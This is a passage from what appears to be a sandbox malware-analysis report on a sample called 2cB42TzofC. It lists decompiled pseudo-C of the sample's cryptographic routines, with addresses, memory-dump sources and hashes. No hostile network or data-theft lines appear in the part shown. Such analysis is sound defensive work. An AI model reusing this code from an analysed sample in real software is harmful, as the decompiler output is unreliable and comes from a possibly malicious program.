					 *(0xa46dc2 + _t181 * 4) = _t159;
					 *(0xa469c1 + _t181 * 4) = _t159;
					 *(0xa465c0 + _t181 * 4) = _t159;
					 *(0xa461c3 + _t181 * 4) = _t159;
					 *(0xa47dc2 + _t199 * 4) = _t159;
					 *(0xa479c1 + _t199 * 4) = _t159;
					 *(0xa475c0 + _t199 * 4) = _t159;
					 *(0xa471c3 + _t199 * 4) = _t159;
					if(_t211 == 0) {
						_t160 = 0;
					} else {
						_t160 =  *(_t220 + ( *(_t220 + _t199 - 0x104) & 0x000000ff) - 0x23d) & 0x000000ff;
					}
					 *(0xa46dc0 + _t181 * 4) = _t160;
					 *(0xa469c3 + _t181 * 4) = _t160;
					 *(0xa465c2 + _t181 * 4) = _t160;
					 *(0xa461c1 + _t181 * 4) = _t160;
					 *(0xa47dc0 + _t199 * 4) = _t160;
					 *(0xa479c3 + _t199 * 4) = _t160;
					 *(0xa475c2 + _t199 * 4) = _t160;
					 *(0xa471c1 + _t199 * 4) = _t160;
					if(_t211 == 0) {
						_t161 = 0;
					} else {
						_t161 =  *(_t220 + ( *(_t220 + _t199 - 0x104) & 0x000000ff) - 0x216) & 0x000000ff;
					}
					 *(0xa46dc1 + _t181 * 4) = _t161;
					 *(0xa469c0 + _t181 * 4) = _t161;
					 *(0xa465c3 + _t181 * 4) = _t161;
					 *(0xa461c2 + _t181 * 4) = _t161;
					 *(0xa47dc1 + _t199 * 4) = _t161;
					 *(0xa479c0 + _t199 * 4) = _t161;
					 *(0xa475c3 + _t199 * 4) = _t161;
					 *(0xa471c2 + _t199 * 4) = _t161;
					if(_t211 == 0) {
						_t162 = 0;
					} else {
						_t162 =  *(_t220 + ( *(_t220 + _t199 - 0x104) & 0x000000ff) - 0x225) & 0x000000ff;
					}
					 *(0xa46dc3 + _t181 * 4) = _t162;
					 *(0xa469c2 + _t181 * 4) = _t162;
					 *(0xa465c1 + _t181 * 4) = _t162;
					 *(0xa461c0 + _t181 * 4) = _t162;
					_t181 = _t181 + 1;
					 *(0xa47dc3 + _t199 * 4) = _t162;
					 *(0xa479c2 + _t199 * 4) = _t162;
					 *(0xa475c1 + _t199 * 4) = _t162;
					 *(0xa471c0 + _t199 * 4) = _t162;
				} while (_t181 < 0x100);
				return _t162;
			}






















                                                        0x00a0e150
                                                        0x00a0e155
                                                        0x00a0e157
                                                        0x00a0e15e
                                                        0x00a0e15e
                                                        0x00a0e165
                                                        0x00a0e16c
                                                        0x00a0e174
                                                        0x00a0e183
                                                        0x00a0e189
                                                        0x00a0e18c
                                                        0x00a0e18e
                                                        0x00a0e192
                                                        0x00a0e194
                                                        0x00a0e196
                                                        0x00a0e1a3
                                                        0x00a0e1a9
                                                        0x00a0e1ab
                                                        0x00a0e1ac
                                                        0x00a0e1b1
                                                        0x00a0e1b3
                                                        0x00a0e1b5
                                                        0x00a0e1cf
                                                        0x00a0e1b7
                                                        0x00a0e1ca
                                                        0x00a0e1ca
                                                        0x00a0e1ed
                                                        0x00a0e1ef
                                                        0x00a0e1f5
                                                        0x00a0e1fc
                                                        0x00a0e203
                                                        0x00a0e20a
                                                        0x00a0e211
                                                        0x00a0e218
                                                        0x00a0e21f
                                                        0x00a0e226
                                                        0x00a0e22f
                                                        0x00a0e246
                                                        0x00a0e231
                                                        0x00a0e23c
                                                        0x00a0e23c
                                                        0x00a0e248
                                                        0x00a0e24f
                                                        0x00a0e256
                                                        0x00a0e25d
                                                        0x00a0e266
                                                        0x00a0e27d
                                                        0x00a0e268
                                                        0x00a0e273
                                                        0x00a0e273
                                                        0x00a0e27f
                                                        0x00a0e284
                                                        0x00a0e290
                                                        0x00a0e29c
                                                        0x00a0e2a5
                                                        0x00a0e2b5
                                                        0x00a0e2e9
                                                        0x00a0e2b7
                                                        0x00a0e2e5
                                                        0x00a0e2e5
                                                        0x00a0e2eb
                                                        0x00a0e2f3
                                                        0x00a0e30a
                                                        0x00a0e2f5
                                                        0x00a0e300
                                                        0x00a0e300
                                                        0x00a0e30c
                                                        0x00a0e30f
                                                        0x00a0e316
                                                        0x00a0e31d
                                                        0x00a0e324
                                                        0x00a0e32b
                                                        0x00a0e332
                                                        0x00a0e339
                                                        0x00a0e340
                                                        0x00a0e349
                                                        0x00a0e35d
                                                        0x00a0e34b
                                                        0x00a0e353
                                                        0x00a0e353
                                                        0x00a0e35f
                                                        0x00a0e366
                                                        0x00a0e36d
                                                        0x00a0e374
                                                        0x00a0e37b
                                                        0x00a0e382
                                                        0x00a0e389
                                                        0x00a0e390
                                                        0x00a0e399
                                                        0x00a0e3ad
                                                        0x00a0e39b
                                                        0x00a0e3a3
                                                        0x00a0e3a3
                                                        0x00a0e3af
                                                        0x00a0e3b6
                                                        0x00a0e3bd
                                                        0x00a0e3c4
                                                        0x00a0e3cb
                                                        0x00a0e3d2
                                                        0x00a0e3d9
                                                        0x00a0e3e0
                                                        0x00a0e3e9
                                                        0x00a0e3fd
                                                        0x00a0e3eb
                                                        0x00a0e3f3
                                                        0x00a0e3f3
                                                        0x00a0e3ff
                                                        0x00a0e406
                                                        0x00a0e40d
                                                        0x00a0e414
                                                        0x00a0e41b
                                                        0x00a0e41c
                                                        0x00a0e423
                                                        0x00a0e42a
                                                        0x00a0e431
                                                        0x00a0e438
                                                        0x00a0e449

                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.292411830.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                        • Associated: 00000001.00000002.292398158.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292495749.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292543053.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292551457.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292577537.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292588496.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_a00000_2cB42TzofC.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 88a2611c7a51ba895fdc97861134805914643a57c2252e68cf242a9e67e6dbe9
                                                        • Instruction ID: 9d965f31c64503e8ea45af07e88f1a96b865dc1e362577cdcc61a710d37eebb5
                                                        • Opcode Fuzzy Hash: 88a2611c7a51ba895fdc97861134805914643a57c2252e68cf242a9e67e6dbe9
                                                        • Instruction Fuzzy Hash: 8581919D6196E4DEC716CFBC38A42F93FA157B7300B1805AAC4C5872A3C137469AE722
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00A0EB7B Relevance: .2, Instructions: 154COMMONCrypto
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E00A0EB7B(signed char __ecx, char _a4) {
				char _v12;
				signed int _v13;
				signed int _v14;
				signed int _v15;
				signed int _v16;
				signed char _v17;
				signed char _v18;
				signed char _v19;
				signed char _v20;
				char _v28;
				signed int _v29;
				signed int _v30;
				signed int _v31;
				signed int _v32;
				signed int _v36;
				signed char _v40;
				signed char _t96;
				signed int _t117;
				signed int* _t121;
				signed int* _t122;
				void* _t124;
				signed int _t125;
				signed int _t126;
				signed int _t127;
				void* _t129;
				void* _t130;
				signed int _t131;
				char* _t132;
				void* _t133;
				signed int _t135;
				signed char _t137;
				signed char* _t139;
				signed char* _t141;
				void* _t161;
				void* _t164;

				_t137 = __ecx;
				_t135 = _a4 - 6;
				_v40 = __ecx;
				_v36 = _t135;
				_t96 = E00A1F750( &_v32, _a4, 0x20);
				_t141 =  &(( &_v40)[0xc]);
				_t117 = 0;
				_t133 = 0;
				_t126 = 0;
				if(_t135 <= 0) {
					L10:
					if(_t117 <= _a4) {
						_t127 = 0xa451a0;
						do {
							_v32 = _v32 ^  *((_t141[0x15 + _t135 * 4] & 0x000000ff) + 0xa44fa0);
							_v31 = _v31 ^  *((_t141[0x16 + _t135 * 4] & 0x000000ff) + 0xa44fa0);
							_v30 = _v30 ^  *((_t141[0x17 + _t135 * 4] & 0x000000ff) + 0xa44fa0);
							_v29 = _v29 ^  *((_t141[0x14 + _t135 * 4] & 0x000000ff) + 0xa44fa0);
							_t96 =  *_t127;
							_v32 = _v32 ^ _t96;
							_v36 = _t127 + 1;
							if(_t135 == 8) {
								_t121 =  &_v28;
								_v40 = 3;
								do {
									_t129 = 4;
									do {
										 *_t121 =  *_t121 ^  *(_t121 - 4);
										_t121 =  &(_t121[0]);
										_t129 = _t129 - 1;
									} while (_t129 != 0);
									_t58 =  &_v40;
									 *_t58 = _v40 - 1;
								} while ( *_t58 != 0);
								_t122 =  &_v12;
								_v40 = 3;
								_v16 = _v16 ^  *((_v20 & 0x000000ff) + 0xa44fa0);
								_v15 = _v15 ^  *((_v19 & 0x000000ff) + 0xa44fa0);
								_v14 = _v14 ^  *((_v18 & 0x000000ff) + 0xa44fa0);
								_v13 = _v13 ^  *((_v17 & 0x000000ff) + 0xa44fa0);
								do {
									_t130 = 4;
									do {
										_t96 =  *((intOrPtr*)(_t122 - 4));
										 *_t122 =  *_t122 ^ _t96;
										_t122 =  &(_t122[0]);
										_t130 = _t130 - 1;
									} while (_t130 != 0);
									_t79 =  &_v40;
									 *_t79 = _v40 - 1;
								} while ( *_t79 != 0);
							} else {
								if(_t135 > 1) {
									_t132 =  &_v28;
									_v40 = _t135 - 1;
									do {
										_t124 = 0;
										do {
											_t96 =  *((intOrPtr*)(_t132 + _t124 - 4));
											 *(_t132 + _t124) =  *(_t132 + _t124) ^ _t96;
											_t124 = _t124 + 1;
										} while (_t124 < 4);
										_t132 = _t132 + 4;
										_t53 =  &_v40;
										 *_t53 = _v40 - 1;
									} while ( *_t53 != 0);
								}
							}
							_t131 = 0;
							if(_t135 <= 0) {
								L37:
								_t164 = _t117 - _a4;
							} else {
								while(_t117 <= _a4) {
									if(_t131 >= _t135) {
										L33:
										_t161 = _t133 - 4;
									} else {
										_t96 =  &(( &_v32)[_t131]);
										_v40 = _t96;
										while(_t133 < 4) {
											 *((intOrPtr*)(_t137 + 0x18 + (_t133 + _t117 * 4) * 4)) =  *_t96;
											_t131 = _t131 + 1;
											_t96 = _v40 + 4;
											_t133 = _t133 + 1;
											_v40 = _t96;
											if(_t131 < _t135) {
												continue;
											} else {
												goto L33;
											}
											goto L34;
										}
									}
									L34:
									if(_t161 == 0) {
										_t117 = _t117 + 1;
										_t133 = 0;
									}
									if(_t131 < _t135) {
										continue;
									} else {
										goto L37;
									}
									goto L38;
								}
							}
							L38:
							_t127 = _v36;
						} while (_t164 <= 0);
					}
				} else {
					while(_t117 <= _a4) {
						if(_t126 < _t135) {
							_t139 =  &(( &_v32)[_t126]);
							while(_t133 < 4) {
								_t125 = _t133 + _t117 * 4;
								_t96 =  *_t139;
								_t126 = _t126 + 1;
								_t139 =  &_a4;
								_t133 = _t133 + 1;
								 *(_v40 + 0x18 + _t125 * 4) = _t96;
								_t135 = _v36;
								if(_t126 < _t135) {
									continue;
								}
								break;
							}
							_t137 = _v40;
						}
						if(_t133 == 4) {
							_t117 = _t117 + 1;
							_t133 = 0;
						}
						if(_t126 < _t135) {
							continue;
						} else {
							goto L10;
						}
						goto L39;
					}
				}
				L39:
				return _t96;
			}






































                                                        0x00a0eb81
                                                        0x00a0eb91
                                                        0x00a0eb94
                                                        0x00a0eb99
                                                        0x00a0eb9d
                                                        0x00a0eba2
                                                        0x00a0eba5
                                                        0x00a0eba7
                                                        0x00a0eba9
                                                        0x00a0ebad
                                                        0x00a0ebf4
                                                        0x00a0ebf7
                                                        0x00a0ebfd
                                                        0x00a0ec02
                                                        0x00a0ec11
                                                        0x00a0ec20
                                                        0x00a0ec2f
                                                        0x00a0ec3e
                                                        0x00a0ec42
                                                        0x00a0ec44
                                                        0x00a0ec49
                                                        0x00a0ec50
                                                        0x00a0ec81
                                                        0x00a0ec85
                                                        0x00a0ec8d
                                                        0x00a0ec8f
                                                        0x00a0ec90
                                                        0x00a0ec93
                                                        0x00a0ec95
                                                        0x00a0ec96
                                                        0x00a0ec96
                                                        0x00a0ec9b
                                                        0x00a0ec9b
                                                        0x00a0ec9b
                                                        0x00a0eca7
                                                        0x00a0ecab
                                                        0x00a0ecb9
                                                        0x00a0ecc8
                                                        0x00a0ecd7
                                                        0x00a0ece6
                                                        0x00a0ecea
                                                        0x00a0ecec
                                                        0x00a0eced
                                                        0x00a0eced
                                                        0x00a0ecf0
                                                        0x00a0ecf2
                                                        0x00a0ecf3
                                                        0x00a0ecf3
                                                        0x00a0ecf8
                                                        0x00a0ecf8
                                                        0x00a0ecf8
                                                        0x00a0ec52
                                                        0x00a0ec55
                                                        0x00a0ec5e
                                                        0x00a0ec62
                                                        0x00a0ec66
                                                        0x00a0ec66
                                                        0x00a0ec68
                                                        0x00a0ec68
                                                        0x00a0ec6c
                                                        0x00a0ec6f
                                                        0x00a0ec70
                                                        0x00a0ec75
                                                        0x00a0ec78
                                                        0x00a0ec78
                                                        0x00a0ec78
                                                        0x00a0ec7f
                                                        0x00a0ec55
                                                        0x00a0ecff
                                                        0x00a0ed03
                                                        0x00a0ed44
                                                        0x00a0ed44
                                                        0x00000000
                                                        0x00a0ed05
                                                        0x00a0ed0c
                                                        0x00a0ed38
                                                        0x00a0ed38
                                                        0x00a0ed0e
                                                        0x00a0ed12
                                                        0x00a0ed15
                                                        0x00a0ed19
                                                        0x00a0ed23
                                                        0x00a0ed27
                                                        0x00a0ed2c
                                                        0x00a0ed2f
                                                        0x00a0ed30
                                                        0x00a0ed36
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a0ed36
                                                        0x00a0ed19
                                                        0x00a0ed3b
                                                        0x00a0ed3b
                                                        0x00a0ed3d
                                                        0x00a0ed3e
                                                        0x00a0ed3e
                                                        0x00a0ed42
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a0ed42
                                                        0x00a0ed05
                                                        0x00a0ed47
                                                        0x00a0ed47
                                                        0x00a0ed47
                                                        0x00a0ec02
                                                        0x00000000
                                                        0x00a0ebaf
                                                        0x00a0ebba
                                                        0x00a0ebc0
                                                        0x00a0ebc4
                                                        0x00a0ebcd
                                                        0x00a0ebd0
                                                        0x00a0ebd3
                                                        0x00a0ebd4
                                                        0x00a0ebd7
                                                        0x00a0ebd8
                                                        0x00a0ebdc
                                                        0x00a0ebe2
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a0ebe2
                                                        0x00a0ebe4
                                                        0x00a0ebe4
                                                        0x00a0ebeb
                                                        0x00a0ebed
                                                        0x00a0ebee
                                                        0x00a0ebee
                                                        0x00a0ebf2
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a0ebf2
                                                        0x00a0ebaf
                                                        0x00a0ed58
                                                        0x00a0ed58

                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.292411830.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                        • Associated: 00000001.00000002.292398158.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292495749.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292543053.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292551457.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292577537.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292588496.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_a00000_2cB42TzofC.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 882ab447c546f65bc4317b39b56a3a72a28acf156c3ea5db5ef0fbd19cd31076
                                                        • Instruction ID: de1cf57c6f01ac7fcad841ed79732655834386b08d9887776dcdc1a490bf7d14
                                                        • Opcode Fuzzy Hash: 882ab447c546f65bc4317b39b56a3a72a28acf156c3ea5db5ef0fbd19cd31076
                                                        • Instruction Fuzzy Hash: 8551E1349083D94FD712CF24A19456EBFE0AFDA314F594C9EE4E54B282C231D64ADB92
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00A0FC43 Relevance: .1, Instructions: 131COMMONCrypto
                                                        Download Yara Rule
                                                        C-Code - Quality: 80%
                                                        			E00A0FC43() {
				signed int _t85;
				signed int* _t86;
				unsigned int* _t87;
				void* _t88;
				unsigned int _t90;
				unsigned int _t113;
				signed int _t115;
				signed int* _t120;
				signed int _t121;
				signed int* _t122;
				signed int _t123;
				void* _t135;
				void* _t136;
				void* _t137;
				signed int _t138;
				void* _t140;

				_t120 =  *(_t140 + 0x130);
				_t123 = 0;
				_t86 =  &(_t120[0xa]);
				do {
					 *((intOrPtr*)(_t140 + 0x30 + _t123 * 4)) = E00A26354( *_t86);
					_t86 =  &(_t86[1]);
					_t123 = _t123 + 1;
				} while (_t123 < 0x10);
				_t87 = _t140 + 0x68;
				_t137 = 0x30;
				do {
					_t90 =  *(_t87 - 0x34);
					_t113 =  *_t87;
					asm("rol esi, 0xe");
					_t87 =  &(_t87[1]);
					asm("ror eax, 0x7");
					asm("rol eax, 0xd");
					asm("rol ecx, 0xf");
					_t87[1] = (_t90 ^ _t90 ^ _t90 >> 0x00000003) + (_t113 ^ _t113 ^ _t113 >> 0x0000000a) +  *((intOrPtr*)(_t87 - 0x3c)) +  *((intOrPtr*)(_t87 - 0x18));
					_t137 = _t137 - 1;
				} while (_t137 != 0);
				_t88 = 0;
				_t138 = _t120[4];
				_t115 = _t120[5];
				 *(_t140 + 0x10) = _t120[1];
				 *(_t140 + 0x20) = _t120[3];
				 *(_t140 + 0x1c) =  *_t120;
				 *(_t140 + 0x18) = _t120[6];
				_t121 =  *(_t140 + 0x1c);
				 *(_t140 + 0x14) = _t120[2];
				 *(_t140 + 0x24) = _t120[7];
				while(1) {
					 *(_t140 + 0x28) = _t138;
					asm("ror esi, 0xb");
					asm("rol eax, 0x7");
					asm("ror eax, 0x6");
					 *(_t140 + 0x18) = _t115;
					_t33 = _t88 + 0xa33a50; // 0x0
					_t135 = (_t138 ^ _t138 ^ _t138) + ( !_t138 &  *(_t140 + 0x18) ^ _t115 & _t138) +  *_t33 +  *((intOrPtr*)(_t140 + _t88 + 0x2c));
					_t88 = _t88 + 4;
					_t136 = _t135 +  *(_t140 + 0x24);
					 *(_t140 + 0x24) =  *(_t140 + 0x18);
					_t138 =  *(_t140 + 0x20) + _t136;
					asm("ror edx, 0xd");
					asm("rol eax, 0xa");
					asm("ror eax, 0x2");
					_t85 =  *(_t140 + 0x10);
					 *(_t140 + 0x10) = _t121;
					 *(_t140 + 0x20) =  *(_t140 + 0x14);
					 *(_t140 + 0x14) = _t85;
					_t121 = (_t121 ^ _t121 ^ _t121) + (( *(_t140 + 0x14) ^  *(_t140 + 0x10)) & _t121 ^  *(_t140 + 0x14) &  *(_t140 + 0x10)) + _t136;
					if(_t88 >= 0x100) {
						break;
					}
					_t115 =  *(_t140 + 0x28);
				}
				 *(_t140 + 0x1c) = _t121;
				_t122 =  *(_t140 + 0x130);
				 *_t122 =  *_t122 +  *(_t140 + 0x1c);
				_t122[1] = _t122[1] +  *(_t140 + 0x10);
				_t122[2] = _t122[2] + _t85;
				_t122[3] = _t122[3] +  *(_t140 + 0x20);
				_t122[5] = _t122[5] +  *(_t140 + 0x28);
				_t122[6] = _t122[6] +  *(_t140 + 0x18);
				_t122[4] = _t122[4] + _t138;
				_t122[7] = _t122[7] +  *(_t140 + 0x24);
				return _t85;
			}



















                                                        0x00a0fc4d
                                                        0x00a0fc54
                                                        0x00a0fc56
                                                        0x00a0fc59
                                                        0x00a0fc60
                                                        0x00a0fc64
                                                        0x00a0fc67
                                                        0x00a0fc69
                                                        0x00a0fc70
                                                        0x00a0fc74
                                                        0x00a0fc75
                                                        0x00a0fc75
                                                        0x00a0fc7a
                                                        0x00a0fc7e
                                                        0x00a0fc81
                                                        0x00a0fc84
                                                        0x00a0fc92
                                                        0x00a0fc95
                                                        0x00a0fca7
                                                        0x00a0fcaa
                                                        0x00a0fcaa
                                                        0x00a0fcb2
                                                        0x00a0fcb6
                                                        0x00a0fcb9
                                                        0x00a0fcbc
                                                        0x00a0fcc3
                                                        0x00a0fcca
                                                        0x00a0fcd1
                                                        0x00a0fcd8
                                                        0x00a0fcdc
                                                        0x00a0fce0
                                                        0x00a0fcea
                                                        0x00a0fcec
                                                        0x00a0fcf0
                                                        0x00a0fcf5
                                                        0x00a0fd04
                                                        0x00a0fd19
                                                        0x00a0fd1d
                                                        0x00a0fd25
                                                        0x00a0fd29
                                                        0x00a0fd2c
                                                        0x00a0fd30
                                                        0x00a0fd34
                                                        0x00a0fd36
                                                        0x00a0fd3b
                                                        0x00a0fd42
                                                        0x00a0fd59
                                                        0x00a0fd5f
                                                        0x00a0fd67
                                                        0x00a0fd6b
                                                        0x00a0fd6f
                                                        0x00a0fd78
                                                        0x00000000
                                                        0x00000000
                                                        0x00a0fce6
                                                        0x00a0fce6
                                                        0x00a0fd7e
                                                        0x00a0fd82
                                                        0x00a0fd8d
                                                        0x00a0fd93
                                                        0x00a0fd98
                                                        0x00a0fd9f
                                                        0x00a0fda6
                                                        0x00a0fdad
                                                        0x00a0fdb0
                                                        0x00a0fdb7
                                                        0x00a0fdc4

                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.292411830.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                        • Associated: 00000001.00000002.292398158.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292495749.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292543053.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292551457.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292577537.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292588496.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_a00000_2cB42TzofC.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: cb652674e8a500109effbe0b68261c54843a61008022bb145ce9a48597eeeb4e
                                                        • Instruction ID: bf2bfedbf71056ebfdd55fc525cd43608907110f80a1487d8a5bfebab7b011d2
                                                        • Opcode Fuzzy Hash: cb652674e8a500109effbe0b68261c54843a61008022bb145ce9a48597eeeb4e
                                                        • Instruction Fuzzy Hash: 7D5146B1A083068FC748CF19D49055AF7E1FF88314F058A2EE899A7740DB34E959CBD6
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00A13A02 Relevance: .1, Instructions: 112COMMONCrypto
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E00A13A02(unsigned int __ecx) {
				intOrPtr _t39;
				signed int _t47;
				intOrPtr _t48;
				signed int _t55;
				signed int _t61;
				signed int _t66;
				intOrPtr _t78;
				signed int _t82;
				unsigned char _t84;
				signed int* _t86;
				intOrPtr _t87;
				unsigned int _t88;
				unsigned int _t89;
				signed int _t90;
				void* _t91;

				_t88 =  *(_t91 + 0x20);
				_t61 = 0;
				_t86 =  *(_t91 + 0x28);
				_t89 = __ecx;
				 *(_t91 + 0x18) = __ecx;
				_t86[3] = 0;
				if( *((intOrPtr*)(_t88 + 8)) != 0 ||  *_t88 <=  *((intOrPtr*)(__ecx + 0x84)) - 7 || E00A14A3C(__ecx) != 0) {
					E00A0A9D7(_t88,  ~( *(_t88 + 4)) & 0x00000007);
					 *(_t91 + 0x18) = E00A0A9EE(_t88) >> 8;
					E00A0A9D7(_t88, 8);
					_t66 =  *(_t91 + 0x14) & 0x000000ff;
					_t39 = (_t66 >> 0x00000003 & 0x00000003) + 1;
					 *((intOrPtr*)(_t91 + 0x10)) = _t39;
					if(_t39 == 4) {
						goto L3;
					}
					_t86[3] = _t39 + 2;
					_t86[1] = (_t66 & 0x00000007) + 1;
					 *(_t91 + 0x20) = E00A0A9EE(_t88) >> 8;
					E00A0A9D7(_t88, 8);
					if( *((intOrPtr*)(_t91 + 0x10)) <= _t61) {
						L9:
						_t84 =  *(_t91 + 0x14);
						 *_t86 = _t61;
						if((_t61 >> 0x00000010 ^ _t61 >> 0x00000008 ^ _t61 ^ _t84 ^ 0x0000005a) !=  *((intOrPtr*)(_t91 + 0x1c))) {
							goto L3;
						}
						_t47 =  *_t88;
						_t86[2] = _t47;
						_t23 = _t47 - 1; // -1
						_t48 =  *((intOrPtr*)(_t89 + 0x88));
						_t78 = _t23 + _t61;
						if(_t48 >= _t78) {
							_t48 = _t78;
						}
						 *((intOrPtr*)(_t89 + 0x88)) = _t48;
						_t86[4] = _t84 >> 0x00000006 & 0x00000001;
						_t86[4] = _t84 >> 7;
						return 1;
					}
					_t87 =  *((intOrPtr*)(_t91 + 0x10));
					_t90 = _t61;
					do {
						_t55 = E00A0A9EE(_t88) >> 8 << _t90;
						_t90 = _t90 + 8;
						_t61 = _t61 + _t55;
						_t82 =  *(_t88 + 4) + 8;
						 *_t88 =  *_t88 + (_t82 >> 3);
						 *(_t88 + 4) = _t82 & 0x00000007;
						_t87 = _t87 - 1;
					} while (_t87 != 0);
					_t86 =  *(_t91 + 0x28);
					_t89 =  *(_t91 + 0x18);
					goto L9;
				} else {
					L3:
					return 0;
				}
			}


















                                                        0x00a13a08
                                                        0x00a13a0c
                                                        0x00a13a0f
                                                        0x00a13a13
                                                        0x00a13a15
                                                        0x00a13a19
                                                        0x00a13a1f
                                                        0x00a13a49
                                                        0x00a13a5c
                                                        0x00a13a60
                                                        0x00a13a69
                                                        0x00a13a74
                                                        0x00a13a75
                                                        0x00a13a7c
                                                        0x00000000
                                                        0x00000000
                                                        0x00a13a85
                                                        0x00a13a88
                                                        0x00a13a99
                                                        0x00a13a9d
                                                        0x00a13aa6
                                                        0x00a13ae1
                                                        0x00a13ae1
                                                        0x00a13af1
                                                        0x00a13afe
                                                        0x00000000
                                                        0x00000000
                                                        0x00a13b04
                                                        0x00a13b06
                                                        0x00a13b09
                                                        0x00a13b0c
                                                        0x00a13b12
                                                        0x00a13b16
                                                        0x00a13b18
                                                        0x00a13b18
                                                        0x00a13b1a
                                                        0x00a13b2a
                                                        0x00a13b2f
                                                        0x00000000
                                                        0x00a13b2f
                                                        0x00a13aa8
                                                        0x00a13aac
                                                        0x00a13aae
                                                        0x00a13aba
                                                        0x00a13abc
                                                        0x00a13ac2
                                                        0x00a13ac4
                                                        0x00a13acf
                                                        0x00a13ad1
                                                        0x00a13ad4
                                                        0x00a13ad4
                                                        0x00a13ad9
                                                        0x00a13add
                                                        0x00000000
                                                        0x00a13a37
                                                        0x00a13a37
                                                        0x00000000
                                                        0x00a13a37

                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.292411830.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                        • Associated: 00000001.00000002.292398158.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292495749.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292543053.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292551457.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292577537.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292588496.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_a00000_2cB42TzofC.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 52abad45f79ce36a7b19b15fd8adf95ea09ff33d00a420e695b3def5234c655d
                                                        • Instruction ID: 1b4f9122fd679f25fe4587a02945af5fdfe4cca769188c05825001a3352235ad
                                                        • Opcode Fuzzy Hash: 52abad45f79ce36a7b19b15fd8adf95ea09ff33d00a420e695b3def5234c655d
                                                        • Instruction Fuzzy Hash: C331F2B26047499FCB14DF28C8516AABBD0FF95340F10492DE4C9C7742D735EA49CB91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00A05EBC Relevance: .1, Instructions: 76COMMONCrypto
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E00A05EBC(signed char _a4, signed char _a8, unsigned int _a12) {
				signed char _t49;
				signed char _t51;
				signed char _t67;
				signed char _t68;
				unsigned int _t72;
				unsigned int _t74;

				_t67 = _a8;
				_t49 = _a4;
				_t74 = _a12;
				if(_t74 != 0) {
					while((_t67 & 0x00000007) != 0) {
						_t49 = _t49 >> 0x00000008 ^  *(0xa3eeb0 + ( *_t67 & 0x000000ff ^ _t49 & 0x000000ff) * 4);
						_t67 = _t67 + 1;
						_a8 = _t67;
						_t74 = _t74 - 1;
